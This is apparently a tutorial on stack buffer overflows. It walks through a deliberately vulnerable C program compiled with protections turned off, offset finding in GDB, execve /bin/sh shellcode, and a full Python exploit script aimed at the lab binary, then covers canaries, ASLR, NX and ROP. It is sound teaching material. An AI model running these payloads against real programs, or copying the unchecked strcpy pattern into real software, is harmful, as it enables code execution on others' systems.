Buffer overflow attacks are some of the oldest yet most fundamental security vulnerabilities. While modern operating systems have added protections (ASLR, stack canaries, DEP), understanding buffer overflows is essential for mastering low-level security concepts and binary exploitation.
This article explains the mechanics, walks through a simple vulnerable program, and shows how attackers exploit it.
What Is a Buffer Overflow?
A buffer overflow occurs when a program writes more data to a buffer than it can hold, overwriting adjacent memory. This can corrupt data, crash the program, or let an attacker execute arbitrary code.
Simple example:
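#include <string.h>
int main(int argc, char *argv[]) {
char buffer[10]; // 10-byte buffer
if (argc < 2) return 1; // Need one argument to copy
const char *input = argv[1]; // User-controlled input
strcpy(buffer, input); // Copy user input with no length check
return 0;
}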
If input is 20 bytes long, strcpy writes 21 bytes (the 20 characters plus the terminating NUL) into 10 bytes of space. The extra 11 bytes spill into adjacent memory.
What gets overwritten depends on memory layout.
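To make the spill concrete, here is a minimal Python sketch that models memory as a flat bytearray. The layout (a 10-byte buffer immediately followed by a 4-byte variable) and the helper name unchecked_copy are assumptions for illustration; a real compiler may insert padding or order variables differently.

```python
# Model a small region of memory: a 10-byte buffer followed by a 4-byte variable.
BUF_SIZE = 10
memory = bytearray(BUF_SIZE) + bytearray(b"SAFE")


def unchecked_copy(mem: bytearray, start: int, data: bytes) -> None:
    """Mimic strcpy: copy data plus a terminating NUL with no bounds check."""
    src = data + b"\x00"
    mem[start:start + len(src)] = src


# 12 characters plus the NUL go into a buffer that only holds 10 bytes.
unchecked_copy(memory, 0, b"A" * 12)

# The neighbouring variable no longer holds b"SAFE".
adjacent = bytes(memory[BUF_SIZE:BUF_SIZE + 4])
print(adjacent)
```

The three bytes that did not fit (two 'A's and the NUL) land in the neighbouring variable, which is the same effect strcpy has on whatever sits next to the real buffer.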
Memory Layout (The Foundation)
Understanding where data lives in memory is crucial. A typical process’s memory is organized as follows:
High Memory Addresses
↑
├─ [Stack] ← grows downward
│ ├─ Function parameters (when passed on the stack)
│ ├─ Return address ← CRITICAL: Where function returns to
│ ├─ Saved frame pointer
│ └─ Local variables (buffers live here, below the return address)
│
├─ (unused space)
│
├─ [Heap] ← grows upward
│ └─ Dynamically allocated memory
│
├─ [BSS Segment]
│ └─ Uninitialized global/static variables
│
├─ [Data Segment]
│ └─ Initialized global/static variables
│
└─ [Code/Text]
└─ Program instructions
Low Memory Addresses
Critical insight: The return address is stored on the stack. If we overflow a buffer on the stack, we can overwrite the return address.
Stack-Based Buffer Overflow
This is the most common type. When a function returns, it reads the return address from the stack and jumps there. If we overwrite that address with our code’s address, we redirect execution.
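The following Python sketch simulates that redirection on a model of a single stack frame. The layout (20-byte buffer, then an 8-byte saved frame pointer, then an 8-byte return address) and every address in it are assumptions chosen for illustration, not values taken from a real binary.

```python
import struct

# Assumed frame layout, from low address to high address:
# [ buffer: 20 bytes ][ saved frame pointer: 8 bytes ][ return address: 8 bytes ]
BUF_SIZE = 20
RET_OFFSET = BUF_SIZE + 8


def build_frame(return_address: int) -> bytearray:
    """Build a simulated frame with an empty buffer and the given return address."""
    saved_fp = 0x7FFFFFFFE000  # made-up saved frame pointer
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", saved_fp, return_address))


def read_return_address(frame: bytearray) -> int:
    """Read the 8-byte little-endian return address out of the frame."""
    return struct.unpack_from("<Q", frame, RET_OFFSET)[0]


frame = build_frame(0x401136)  # hypothetical legitimate return address
overflow = b"A" * RET_OFFSET + struct.pack("<Q", 0x401196)  # hypothetical target
frame[0:len(overflow)] = overflow  # unchecked copy, as strcpy would do

print(hex(read_return_address(frame)))
```

After the copy, the value the function would "return" to is the attacker-chosen one, even though the code only ever wrote to the buffer.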
Vulnerable Program Example
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[20];
strcpy(buffer, input); // VULNERABLE: No bounds checking
printf("You entered: %s\n", buffer);
}
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
printf("Program completed successfully\n");
return 0;
}
Save as vulnerable.c and compile (disable protections for learning):
gcc -fno-stack-protector -z execstack -no-pie vulnerable.c -o vulnerable
# -fno-stack-protector: Disable stack canary
# -z execstack: Make stack executable
# -no-pie: Load the program at a fixed address (matches the checksec output shown later)
Normal Execution
./vulnerable "hello"
You entered: hello
Program completed successfully
Buffer Overflow - Crash
Input long enough to run past the 20-byte buffer and reach the saved frame pointer and return address causes a crash:
./vulnerable "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
The extra ‘A’s overwrite the return address, so it points to invalid memory. The program crashes when vulnerable_function returns.
Finding the Offset
To exploit this, we need to know:
- Buffer size: 20 bytes
- Offset to return address: How many bytes before we reach the return address?
Use GDB (debugger) to find it:
gdb ./vulnerable
(gdb) run $(python3 -c "print('A'*30)")
The program crashes. Print a backtrace:
(gdb) bt
#0 0x41414141 in ?? ()
#1 0x00007fff... in ?? ()
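The 0x41414141 (hex for ‘AAAA’) shows the return address is overwritten with ‘A’s. On x86-64, an address made up entirely of ‘A’s is non-canonical, so the fault is raised at the ret instruction itself; in that case rip still points into vulnerable_function and the overwritten value is visible at the top of the stack (x/gx $rsp).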
Determining exact offset:
Create a pattern that’s easier to locate:
python3 -c "import string; import itertools; \
s = ''.join(''.join(p) for p in itertools.product(string.ascii_lowercase, repeat=2)); \
print(s[:50])"
# Output: aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxay
Run with pattern:
(gdb) run $(python3 -c "import string; import itertools; \
s = ''.join(''.join(p) for p in itertools.product(string.ascii_lowercase, repeat=2)); \
print(s[:100])")
Check registers:
(gdb) info registers rsp rip
rip 0x61706b61 0x61706b61
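The value 0x61706b61 is part of our pattern. Because x86 is little-endian, read its bytes in reverse order to get the ASCII substring, then find where that substring starts in the pattern. That index is the offset.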
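Counting by hand is error-prone, so the lookup can be scripted. This is a minimal sketch: make_pattern rebuilds the two-letter pattern from the command above, and find_offset is a hypothetical helper name. The register value used here is manufactured from the pattern itself purely to demonstrate the lookup; it is not output from a real debugging session.

```python
import itertools
import string


def make_pattern(length: int) -> bytes:
    """Rebuild the two-letter pattern used above (aa, ab, ac, ...)."""
    pairs = itertools.product(string.ascii_lowercase, repeat=2)
    return "".join("".join(p) for p in pairs)[:length].encode()


def find_offset(register_value: int, pattern: bytes, width: int = 4) -> int:
    """Return the index of the register's bytes in the pattern, or -1 if absent."""
    # x86 stores integers little-endian, so convert back to memory order first.
    needle = register_value.to_bytes(width, "little")
    return pattern.find(needle)


pattern = make_pattern(100)

# Pretend the debugger showed the four pattern bytes that start at index 28.
example_value = int.from_bytes(pattern[28:32], "little")
print(hex(example_value), find_offset(example_value, pattern))
```

A result of -1 means the value did not come from the pattern, which usually indicates the crash happened somewhere other than the overwritten return address. Dedicated pattern generators, such as the cyclic helpers in pwntools, guarantee that every window is unique, which this simple two-letter pattern does not at longer lengths.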
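Simpler approach: Use trial and error with inputs of increasing length.
- 24 bytes: Runs past the buffer into the saved frame pointer; may crash
- 28 bytes: Fills everything up to the return address
- 32 bytes: The last 4 bytes land in the return address
Through testing, offset = 28 bytes on this build. The exact value depends on the compiler, its version, and its flags, so confirm it on your own binary.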
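The trial-and-error loop can be automated. The sketch below assumes the binary is at ./vulnerable and that a crash shows up as a SIGSEGV exit status; crashes_with and first_crashing_length are hypothetical helper names. The demo call at the end uses a stand-in check so the snippet runs without the binary present.

```python
import signal
import subprocess
from typing import Callable, Optional


def crashes_with(length: int, binary: str = "./vulnerable") -> bool:
    """Run the target with `length` 'A's and report whether it died from SIGSEGV."""
    result = subprocess.run([binary, "A" * length], capture_output=True)
    # On POSIX, a negative return code is the number of the signal that killed the child.
    return result.returncode == -signal.SIGSEGV


def first_crashing_length(check: Callable[[int], bool],
                          start: int = 1, stop: int = 64) -> Optional[int]:
    """Return the smallest length in [start, stop] for which check(length) is True."""
    for length in range(start, stop + 1):
        if check(length):
            return length
    return None


# Stand-in check for demonstration; pass crashes_with to probe the real binary.
demo_result = first_crashing_length(lambda n: n >= 25)
print(demo_result)
```

With the real binary, first_crashing_length(crashes_with) gives the shortest input that crashes. That length is a hint rather than the offset itself, because corrupting the saved frame pointer can crash the program before the return address is reached.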
Crafting the Exploit
Now that we know the offset, we can control the return address.
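python3 << 'EOF'
import sys
# 28 bytes of padding, then the new return address (little-endian, 64-bit)
offset = 28
return_address = 0x0000555555554999 # Example address to jump to
# strcpy stops at the first NUL byte, so drop the address's zero high bytes;
# strcpy's own terminator and the zero byte already on the stack take their place
addr_bytes = return_address.to_bytes(8, 'little').rstrip(b'\x00')
payload = b'A' * offset + addr_bytes
sys.stdout.buffer.write(payload) # Emit raw bytes, not the b'...' repr
EOF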
But where does the return address point?
Without ASLR and DEP, the shellcode can go on the stack itself.
Shellcode
Shellcode is machine code that executes a shell or other commands. For x86-64 Linux:
; Minimal exit shellcode (exit code 0)
mov rax, 60 ; syscall number for exit
xor rdi, rdi ; exit code = 0
syscall
; In hex: 48c7c03c000000 (mov) + 4831ff (xor) + 0f05 (syscall)
; Total: \x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05
; Note: this encoding contains NUL bytes, which strcpy will not copy past
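Because strcpy stops copying at the first NUL byte, shellcode delivered through it must not contain any. The sketch below checks a byte string for such "bad bytes". The helper name bad_byte_offsets is hypothetical, and the second byte string is an assumed NUL-free alternative (push 60; pop rax; xor edi, edi; syscall) rather than something taken from the listing above.

```python
from typing import List


def bad_byte_offsets(shellcode: bytes, bad: bytes = b"\x00") -> List[int]:
    """Return the offsets of every byte in shellcode that appears in bad."""
    return [i for i, value in enumerate(shellcode) if value in bad]


# Bytes from the exit shellcode listing above.
with_nuls = b"\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05"

# Assumed alternative encoding: push 60 ; pop rax ; xor edi, edi ; syscall
nul_free = b"\x6a\x3c\x58\x31\xff\x0f\x05"

print(bad_byte_offsets(with_nuls))
print(bad_byte_offsets(nul_free))
```

The 32-bit immediate in mov rax, 60 is what introduces the zero bytes; loading the value through push and pop avoids them. Other input paths have their own bad bytes (a newline for gets, for example), which can be passed in through the bad parameter.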
More useful: execve syscall (spawn /bin/sh):
; execve("/bin/sh", NULL, NULL) syscall
mov rax, 59 ; execve syscall
lea rdi, [rel binsh] ; /bin/sh string
xor rsi, rsi ; argv = NULL
xor rdx, rdx ; envp = NULL
syscall
binsh: db "/bin/sh", 0 ; string the lea above refers to
; Precomputed: \x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\x0e\x00\x00\x00...
Finding Protections
Before exploiting, check what protections are enabled:
checksec --file=vulnerable
Arch: amd64-64-bit
RELRO: Partial
Stack: No canary found
NX: NX disabled
PIE: No
RWX: Has RWX segments
- Stack: No canary: Good! Stack overflow not detected.
- NX: NX disabled: Good! Stack is executable.
- PIE: No: Good! Addresses are predictable.
In a real program with modern protections, exploitation is much harder.
Complete Exploit Example
Given the vulnerable program and our analysis:
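#!/usr/bin/env python3
import subprocess
offset = 28 # Bytes from the start of buffer to the return address
shell_addr = 0x7ffffffde000 + 1000 # Approximate stack address (without ASLR); read the real buffer address from GDB
# NUL-free exit(0) shellcode (demo): push 60; pop rax; xor edi, edi; syscall
# Arguments and strcpy both end at the first NUL byte, so the payload cannot contain one
shellcode = b'\x6a\x3c\x58\x31\xff\x0f\x05'
# Drop the address's zero high bytes; the matching bytes of the saved return address are already zero
addr = shell_addr.to_bytes(8, 'little').rstrip(b'\x00')
# Shellcode + padding up to offset + return address pointing to shellcode
payload = shellcode + b'A' * (offset - len(shellcode)) + addr
assert b'\x00' not in payload
# Run vulnerable program with payload
result = subprocess.run(['./vulnerable', payload], capture_output=True)
print(result.stdout.decode(errors='replace'))
print(result.stderr.decode(errors='replace'))
print('exit status:', result.returncode)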
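If successful, the program exits with status 0 through our exit syscall instead of crashing with a segmentation fault; with execve shellcode in place of the exit shellcode, it would launch a shell.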
Modern Protections (Why This Doesn’t Work in Real Programs)
1. Stack Canary
A random value placed between the local variables and the return address. If an overflow changes it, the program terminates before the function returns:
// Compiled with -fstack-protector (default in modern systems)
void function(const char *input) {
char buffer[20];
// Compiler adds: uint64_t canary = __stack_chk_guard;
strcpy(buffer, input);
// Compiler adds: if (canary != __stack_chk_guard) __stack_chk_fail();
}
Overflow the buffer, and the canary check fails before return.
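The check can be simulated on a model frame. This is a sketch under assumptions: the layout (20-byte buffer, 8-byte canary, 8-byte return address) and the return address are made up, and call_with_input is a hypothetical name. The guard's low byte is zeroed, mirroring a common implementation choice that also makes the canary hard to reproduce through string functions.

```python
import secrets
import struct

BUF_SIZE = 20
CANARY_OFFSET = BUF_SIZE        # in this model the canary sits right after the buffer
RET_OFFSET = CANARY_OFFSET + 8  # and the return address follows the canary


def call_with_input(data: bytes, guard: int) -> str:
    """Simulate a protected function: unchecked copy, then canary verification."""
    frame = bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", guard, 0x401136))
    frame[0:len(data)] = data  # the overflow happens here
    canary = struct.unpack_from("<Q", frame, CANARY_OFFSET)[0]
    if canary != guard:
        return "stack smashing detected"  # a real program would abort here
    return "returned normally"


# Random 64-bit guard with a zero low byte (assumed convention for this model).
guard = secrets.randbits(56) << 8

print(call_with_input(b"hello", guard))
print(call_with_input(b"A" * 36, guard))
```

An input cannot reach the return address without first passing through the canary, so the corruption is caught before the overwritten address is ever used.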
2. Address Space Layout Randomization (ASLR)
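Stack, heap, and shared-library addresses are randomized on each run (code addresses too, for PIE binaries):
for i in {1..5}; do
# GDB disables ASLR by default, so turn randomization back on; break at main so the process is still alive
gdb -batch -ex 'set disable-randomization off' -ex 'break main' -ex 'run' -ex 'info proc mappings' ./vulnerable 2>/dev/null | grep stack | head -1
done
# Different addresses each run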
Without knowing the exact stack address, returning to shellcode is unreliable; an attacker first needs an information leak or some other way to learn the address.
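On Linux, the same information is available without a debugger through /proc/<pid>/maps. The sketch below parses that text format to pull out the stack mapping; stack_range is a hypothetical helper name, and the sample line uses made-up addresses so the snippet runs on any platform.

```python
from typing import Optional, Tuple


def stack_range(maps_text: str) -> Optional[Tuple[int, int]]:
    """Parse /proc/<pid>/maps text and return (start, end) of the [stack] mapping."""
    for line in maps_text.splitlines():
        if line.rstrip().endswith("[stack]"):
            start, end = line.split()[0].split("-")
            return int(start, 16), int(end, 16)
    return None


# Sample line in the /proc/<pid>/maps format (addresses are made up).
sample = "7ffc1a2b3000-7ffc1a2d4000 rw-p 00000000 00:00 0                          [stack]\n"

parsed = stack_range(sample)
print([hex(value) for value in parsed])
```

On a Linux machine, calling stack_range(open("/proc/self/maps").read()) from several fresh Python processes should print a different range each time while ASLR is enabled.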
3. Data Execution Prevention (DEP/NX)
Stack is non-executable. Shellcode on the stack won’t run:
checksec --file=vulnerable
NX: NX enabled # Stack not executable
Injected shellcode cannot run, so attackers reuse code that is already in executable memory, for example by chaining ROP gadgets.
Why Learn Buffer Overflows?
- Understand memory: Low-level security concepts
- CTF competitions: Buffer overflows appear regularly
- Legacy systems: Older code lacks protections
- Reverse engineering: Recognize overflow patterns
- Defense: Know what NOT to do in code
Practical Lab Exercise
Set up a vulnerable program:
# Create vulnerable.c (code above)
gcc -fno-stack-protector -z execstack -no-pie vulnerable.c -o vulnerable
# Use GDB to find offset
gdb ./vulnerable
(gdb) run $(python3 -c "print('A'*100)")
# Crashes; examine rip and the top of the stack (x/gx $rsp)
# Craft payload (passed as an argument, since the program reads argv[1], not stdin)
./vulnerable "$(python3 -c "import sys; sys.stdout.buffer.write(b'A'*28 + b'\xff\xff\xff\x7f\xff\xff\xff\x7f')")"
# Program crashes with controlled address
Next level (ROP):
With modern protections, use Return-Oriented Programming (ROP):
- Chain small code snippets (gadgets) to build new functionality
- Tools: ropper, ROPgadget
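A ROP payload has the same shape as the earlier one, except that the padding is followed by a sequence of addresses instead of a single one. The sketch below lays out a three-word chain. Every address in it is hypothetical; in practice they come from a gadget-finding tool run against the actual binary, and build_rop_chain is an illustrative helper name.

```python
import struct
from typing import List


def build_rop_chain(offset: int, words: List[int]) -> bytes:
    """Pad up to the return address, then append each 64-bit word little-endian."""
    return b"A" * offset + b"".join(struct.pack("<Q", word) for word in words)


# All three addresses are hypothetical placeholders.
POP_RDI_RET = 0x401263  # gadget: pop rdi ; ret
BINSH_STR = 0x402010    # address of a "/bin/sh" string
SYSTEM_FN = 0x401050    # address of system()

# ret -> pop rdi (loads BINSH_STR into rdi) -> ret -> system("/bin/sh")
chain = build_rop_chain(28, [POP_RDI_RET, BINSH_STR, SYSTEM_FN])
print(len(chain), chain[28:36].hex())
```

Each 8-byte word here contains NUL bytes, so a chain like this needs an input path that tolerates them (read or fgets, for example); strcpy would stop after the first address.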
Conclusion
Buffer overflows are memory corruption vulnerabilities where attackers write beyond allocated buffers and overwrite critical data (return addresses, function pointers, etc.). While modern OSes have mitigated the simplest exploits, understanding buffer overflows is fundamental to binary security.
Binary exploitation (pwn) categories in CTFs regularly include overflow challenges. Learn to:
- Identify vulnerable code patterns (strcpy, sprintf, gets)
- Map memory layout
- Calculate offsets
- Understand protection mechanisms
- Bypass or work around protections
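As a starting point for the first item, a few lines of Python can flag calls to the unbounded functions named above. This is a rough text search under stated assumptions, not a real static analyzer: find_risky_calls is a hypothetical helper, and it will also match names inside comments or string literals.

```python
import re
from typing import List, Tuple

# Functions named in the list above that copy without a length limit.
RISKY_CALLS = ("strcpy", "sprintf", "gets")
_CALL_PATTERN = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\s*\(")


def find_risky_calls(source: str) -> List[Tuple[int, str]]:
    """Return (line_number, function_name) for each risky call in C source text."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in _CALL_PATTERN.finditer(line):
            hits.append((lineno, match.group(1)))
    return hits


sample = '''void f(char *input) {
    char buffer[20];
    strcpy(buffer, input);
    snprintf(buffer, sizeof buffer, "%s", input);
}'''

hits = find_risky_calls(sample)
print(hits)
```

The word-boundary anchor keeps bounded variants such as snprintf and fgets from being reported, so only the strcpy call on line 3 of the sample is flagged.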
Master buffer overflows, and you’ll understand systems security at its core.